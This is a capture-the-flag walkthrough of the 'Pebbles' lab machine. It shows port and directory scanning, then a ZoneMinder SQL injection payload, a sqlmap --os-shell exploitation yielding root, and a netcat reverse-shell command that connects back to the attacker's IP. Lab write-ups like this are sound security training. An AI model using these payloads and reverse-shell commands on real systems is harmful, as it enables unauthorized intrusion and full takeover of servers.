Pebbles
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.215.52
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-07 02:25 EST
Nmap scan report for 192.168.215.52
Host is up, received reset ttl 61 (0.23s latency).
Scanned at 2025-11-07 02:25:03 EST for 52s
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTlsFY1sjAxyC1lqlzeHAaSC0ec76cB5Hoq6aVwMNphXzrhslKqJJ5L0sjOjQem02G6wukOQ/qIVzUZOPxdn4tlN+YuCRqrE7nSIj36hh6JeG4cI9t3qOJUPndLKuKSyJKwV1Dl7gQKcjS0gxO6kWybHMf4CT9a8QsF8mLDPNU3p5VfsEdrgJ+q5hNOmLYJPqwIHTdCweuSwaORn9wQGlmKphGZJlktEKEPwecDZO5KUc6g3N23G+vWv2uCmAw9ov8AQrePxdjz5/QQ8PdY6zedwcLUFjmL5jx9UhZLhDDf/pzP0wiswgm7DZXG6WHwMCbxNo0zX4/HFDswDHc/W+J
| 256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOrgGvGclvZKKtoTk+H0ojQxTTSKljSVFLY8udD6Cb8OQLjgd5F48Em8sa7JjoCa4Mn3USw7EttQLL9a1RNEgio=
| 256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBSm8eCxMlgt56SQ1z3TjY8R0ZY2MMMlYTB4Bby39xXE
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Pebbles
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 7EC7ACEA6BB719ECE5FCE0009B57206B
|_http-server-header: Apache/2.4.18 (Ubuntu)
3305/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
8080/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-favicon: Apache Tomcat
|_http-title: Tomcat
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
<snipped>We have three ports running http, and ssh on port 22.
HTTP (8080):
Just tomcat welcoming page without any functioning.
HTTP (3305):
The same for tomcat.
HTTP (80):
I tried default credentials, sql injection, but nothing worked.
Lets try directory fuzzing:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ gobuster dir -u http://192.168.215.52/ -w /usr/share/wordlists/dirb/big.txt -x php -t 40
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.215.52/
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.php (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/cgi-bin/ (Status: 403) [Size: 279]
/cgi-bin/.php (Status: 403) [Size: 279]
/css (Status: 301) [Size: 314] [--> http://192.168.215.52/css/]
/images (Status: 301) [Size: 317] [--> http://192.168.215.52/images/]
/index.php (Status: 200) [Size: 1134]
/javascript (Status: 301) [Size: 321] [--> http://192.168.215.52/javascript/]
/server-status (Status: 403) [Size: 279]
/zm (Status: 301) [Size: 313] [--> http://192.168.215.52/zm/]
Progress: 40938 / 40938 (100.00%)
===============================================================
Finished
===============================================================We will find a strange directory named zm, browse to this:
We have some sort of a service called zoneminder with its version exposed to us.
Exploitation:
Lets search for any public exploit on that version:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ searchsploit zoneminder 1.29
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery | php/webapps/41239.txt
ZoneMinder Snapshots < 1.37.33 - Unauthenticated RCE | php/webapps/51902.py
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No ResultsCopy the first one:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ searchsploit -m php/webapps/41239.txt
Exploit: Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery
URL: https://www.exploit-db.com/exploits/41239
Path: /usr/share/exploitdb/exploits/php/webapps/41239.txt
Codes: N/A
Verified: False
File Type: HTML document, ASCII text
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Pebbles/41239.txtLets inspect the file to see what we can find:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ cat 41239.txt
<snipped>
2)SQL Injection
Example Url:http://192.168.241.131/zm/index.php
Parameter: limit (POST)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: view=request&request=log&task=query&limit=100;(SELECT *
FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434
Easy exploitable using sqlmap.Lets use sqlmap to find the vulnerability and exploit it to get shell on the target if we have access as a high privileged user:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ sqlmap http://192.168.215.52:8080/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" --os-shell
___
__H__
___ ___[(]_____ ___ ___ {1.9.10#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
<snipped>
[02:46:52] [INFO] POST parameter 'limit' appears to be 'MySQL >= 5.0.12 stacked queries (comment)'' injectable
<snipped>
sqlmap identified the following injection point(s) with a total of 2326 HTTP(s) requests:
---
Parameter: limit (POST)
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: view=request&request=log&task=query&limit=100;SELECT SLEEP(5)#&minTime=5
---
[02:47:57] [INFO] the back-end DBMS is MySQL
[02:47:57] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[02:47:58] [INFO] fingerprinting the back-end DBMS operating system
[02:47:58] [INFO] the back-end DBMS operating system is Linux
[02:47:59] [INFO] testing if current user is DBA
[02:47:59] [INFO] fetching current user
[02:47:59] [INFO] retrieved:
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[02:48:19] [INFO] adjusting time delay to 1 second due to good response times
root@localhost
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bitSelect 2:
> 2
[02:49:30] [INFO] checking if UDF 'sys_exec' already exist
[02:49:30] [INFO] checking if UDF 'sys_eval' already exist
[02:49:30] [INFO] detecting back-end DBMS version from its banner
[02:49:30] [INFO] retrieved: 5.7.30-0ubuntu0.16.0
<snipped>
[02:57:12] [INFO] the local file '/tmp/sqlmapgcef_yle12662/lib_mysqludf_sys2loln42s.so' and the remote file '/usr/lib/mysql/plugin/libsbvjw.so' have the same size (8040 B)
[02:57:13] [INFO] creating UDF 'sys_exec' from the binary UDF file
[02:57:13] [INFO] creating UDF 'sys_eval' from the binary UDF file
[02:57:14] [INFO] going to use injected user-defined functions 'sys_eval' and 'sys_exec' for operating system command execution
[02:57:14] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
[04:27:52] [INFO] retrieved: rootSo the user running this mysql services is the root user, and we have an sqlmap shell as root.
Lets get an interactive shell.
Start a netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ nc -nlvp 3305
listening on [any] 3305 ...os-shell> busybox nc 192.168.45.174 3305 -e bash
do you want to retrieve the command standard output? [Y/n/a] Y
[04:42:58] [INFO] retrieved:
command standard output: ' '┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pebbles]
└─$ nc -nlvp 3305
listening on [any] 3305 ...
connect to [192.168.45.174] from (UNKNOWN) [192.168.215.52] 54738Here we have a connection back from the target.
Since we are root, lets get the root flag:
whoami
root
cd /root
ls
proof.txt
cat proof.txt
d135189cae5eef88d3fd1ce69894ec6aLast updated